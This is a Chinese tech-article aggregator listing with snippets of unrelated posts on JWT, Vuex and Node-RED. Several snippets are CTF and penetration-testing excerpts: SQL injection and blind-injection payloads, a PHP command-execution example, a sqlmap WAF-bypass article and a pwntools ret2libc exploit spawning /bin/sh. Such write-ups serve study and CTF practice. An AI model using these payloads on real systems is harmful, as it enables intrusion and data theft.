ICode9

精准搜索请尝试: 精确搜索
  • 利用Python编写测试目标网页是否存在XSS漏洞的工具2022-05-02 15:32:18

        以DVWA应用为目标,测试目标URL是否存在XSS漏洞,其基本思想是:     1. 利用session登录DVWA应用     2. 下载目标URL网页,并提取出表单以及input等名称     3. 构造请求,并将XSS测试语句作为表单的提交内容 import requests from lxml import etree import sys c

  • dva做数据管理2022-05-01 22:00:08

    dva 基于 redux 和 redux-saga 的数据流方案,然后为了简化开发体验,今天就讲一下具体的使用 实现的效果:计算器的同步增减及异步修改数据 1.创建ui component return ( <> <div> 测试组件 Option:<input ref={inputRef} def

  • Java安全之JSF 反序列化2022-04-29 02:32:58

    Java安全之jsf 反序列化 前言 偶遇一些奇葩环境,拿出来炒冷饭 JSF简述 JSF”指的是2004年发布的第一个版本的Java规范。这方面的许多实现 规范存在。其中最常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFaces JavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE中使

  • 渗透测试-20:Payload 总结2022-04-15 00:34:27

    SQL注入 通用 select user(),version(),database() select group_concat(schema_name) from information_schema.schemata select group_concat(table_name) from information_schema.tables where table_schema=database() select group_concat(column_name) from information_sc

  • Node-RED中使用function函式节点实现数值计算(相加计算)2022-04-13 22:00:09

    场景 Node-RED简介与Windows上安装、启动和运行示例: https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/121884766 Node-RED怎样导出导入流程为json文件: https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/124130985 Node-RED中函式节点可以建立JavaScript函

  • drf(十一) jwt的原理及使用2022-04-12 17:32:20

    JWT的原理及使用 介绍: # jwt 一般用于用户认证(前后端分离,微信小程序,uniapp)的开发 json web token 认证流程。 1. 区别 传统认证 用户登录,服务端返回token,并将token保存在服务端 以后用户再来访问,需要携带token,服务端获取token后,再去数据库中获取token进行校验。 jwt认

  • 控制登录接口返回的数据格式2022-04-08 02:34:01

    -第一种方案,自己写登录接口 -第二种写法,用内置,控制登录接口返回的数据格式 -jwt的配置信息中有这个属性 'JWT_RESPONSE_PAYLOAD_HANDLER': 'rest_framework_jwt.utils.jwt_response_payload_handler', -重写jwt_response_payload_handler,配置成咱们

  • 自定义基于jwt的验证2022-04-08 02:33:22

    # 3 自定义基于jwt的权限类 from rest_framework.authentication import BaseAuthentication # 基于它 from rest_framework_jwt.authentication import BaseJSONWebTokenAuthentication # 基于它 from rest_framework.exceptions import AuthenticationFailed # from rest_fram

  • 自定制auth认证类-jwt2022-04-08 02:00:30

    from rest_framework_jwt.authentication import BaseAuthentication,BaseJSONWebTokenAuthentication from rest_framework.exceptions import AuthenticationFailed from rest_framework_jwt.authentication import jwt_decode_handler from rest_framework_jwt.authenticat

  • sqlmap绕华夫2022-03-30 00:36:05

    0x001 waf介绍 Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF) 核心目的:防御网站被入侵。 具体手段:检测到你的入侵者,然后拦截你当前访问的页面或者是跳转其他页面,或者是直接禁止你的ip访问。 日常生活中,有些网站不一定安装了WAF,但是他可能会

  • 2021 虎符杯hate num 注入题2022-03-29 11:33:32

    前言 今天遇到个有意思的SQL盲注,花了不少功夫,也学到了新姿势,遂记录下来以备后续碰到相同场景使用。 题目 这是2021 虎符杯的一道web题,有一个目标站点且附带了源码。 源码内容包括: 主要逻辑在login.php 与config.php,删去多余代码,主要功能在登陆上。 前端登录表单会发送给login.php

  • PHP命令执行集锦2022-03-21 16:04:05

    前言 代码审计总要遇到命令执行或者说RCE,打CTF的过程中难免不会碰见,毕竟PHP是世界上最好的语言,总结一下 命令执行函数 E.g.1 <?php error_reporting(0); show_source(__FILE__); $a = "$_GET[c]"; $b = "$_GET[d]"; $array[0] =$b; $c = array_map($a,$array); ?> 传入参

  • 「Vuex源码学习」你知道Vuex的实现原理吗?2022-03-20 09:31:25

    简单原理实现 讲解 看了Vuex源码文件,发现确实很多,我这里就讲我们最常用的部分功能的源码吧 其实使用过 Vuex 的同学都知道,我们在页面或者组件中都是通过this.$store.xxx 来调用的,那么其实,我们只要把你所创建的store对象赋值给页面或者组件中的$store变量即可 Vuex的原理

  • ret2libc 12022-03-04 18:04:57

    ret2libc 1 exp from pwn import * p = process('./ret2libc1') elf = ELF('./ret2libc1') system_plt = elf.plt["system"] bin_sh = next(elf.search(b"/bin/sh")) payload = b'A'*112 + p32(system_plt) + b'A

  • django-jwt | django缓存2022-03-03 19:02:42

    昨日回顾 # 1 自定义了频率类 # 2 自动生成接口文档 # 3 jwt:三部分组成:头+荷载(用户数据)+签名 # 4 drf中使用jwt:djangorestframework_jwt -路由里配了一条 # 作业 1 自定义User表,新增mobile唯一约束字段;新增icon图片字段 2 在自定义User表基础上,用 GenericViewSet + CreateMod

  • [BUU-WriteUp]rip2022-02-25 10:58:59

    rip 使用checksec查看: 保护措施全部关闭。 放进IDA中分析: gets():存在栈溢出 fun(): 存在后门函数 步骤解析 s 距离 rbp 0xF,无canary,直接覆盖即可 完整exp from pwn import * p = process("../buu/rip") # p = remote("node4.buuoj.cn",27965) elf = ELF("../buu/rip")

  • NSSCTF-gift_pwn2022-02-21 13:00:19

      最近才开始接触”pwn“这个东西,这是近两天做的一个题目,然后就想着记一下。 好的,不如正题, 直接nc连接返回空白,然后直接退出,用kali的checksec工具或者是die检测一下附件,    看到有NX,然后是一个64位的应用程序,拖入ida查看,shift+f12看相应的字符串    看到了/bin/sh,    

  • Golang 盲注脚本2022-02-21 05:00:11

    Golang 盲注脚本 payload部分 其中脚本最重要的环节就是payload部分了,需要如何去闭合,如何构造SQL语句来达到判断的效果。(还有如何绕过waf等等。。。) bool盲注 下面是最基础的布尔型盲注的payload ' and length(database()=n)--+ ' and (ascii(substr(database(),1))=110 --+ '

  • Scrapy 发送Request Payload2022-02-17 16:01:02

    首先要打开 F12 进入调试模式 然后 查看是用什么方法获取的 如果是Json: yield Request( url="xxxxx.com", method="POST", body=json.dumps(data), headers={'Content-Type': 'application/json'}, callback=self.parse_json, )   如果是 其他

  • [WUSTCTF2020]朴实无华2022-02-14 23:36:04

    首先打开题目 只有一个Hack me,然后抓包      没有得到什么,不过title里面有个bot 于是联想到robots.txt User-agent: * Disallow: /fAke_f1agggg.php 然后打开Fake_flagggg.php     然后在抓包结果看一下,发现了  Look_at_me: /fl4g.php    于是我打开fl4g.php  

  • rop emporium call me (x64)2022-02-10 12:31:01

    这道题惊喜点在于.so文件也可以拖到ida里逆向,服! 下面是题解过程: 左边发现奇怪的callme-one,two,three. 但是人家动态链接了,不知道内容是什么就无法利用,使用ida,把so文件拽里面 告诉我们,按这个参数就correctly了。 下面反倒过程平平无奇了 使用ROPgadget  找到三个参数的pop rdi

  • Cobalt Strike与MSF联动2022-02-10 10:03:15

    文中通过详细讲解CobaltStrike工具,更加深入的掌握CobaltStrike用法;文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。 Cobalt Strike 与

  • TCP RTT 和乱序重传计算2022-02-09 18:07:45

    目录 RTT 乱序重传 工作中需要计算tcp 的rtt和重传连续包,以下是我们计算的方法。 RTT Round trip time 往返时间 (RTT),是网络请求从起点到达目的地并再次返回起点所需的持续时间。 在tcp中是发送包到与接收到与此数据包对应的ack包的持续时间,在我们的计算中对于下图第三种情况,

  • 26 drf-jwt修改签发响应格式2022-02-08 19:31:55

    使用jwt自带的登录认证obtain_jwt_token,只返回了一个token         我们需要自定义认证返回结果: common.py # 写一个函数,函数的返回值,就是响应的格式 # 在配置文件中配置一下 def jwt_response_payload_handler(token, user=None, request=None): return { 'co

  • xss_labs练习2022-02-07 14:32:59

    第一关 源码分析 $str = $_GET["name"]; echo "<h2 align=center>欢迎用户".$str."</h2>"; //直接输出,无任何过滤措施 构造payload 第二关 源码分析 $str = $_GET["keyword"]; echo "<h2 align=center>没有找到和".htmlspecialchars

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有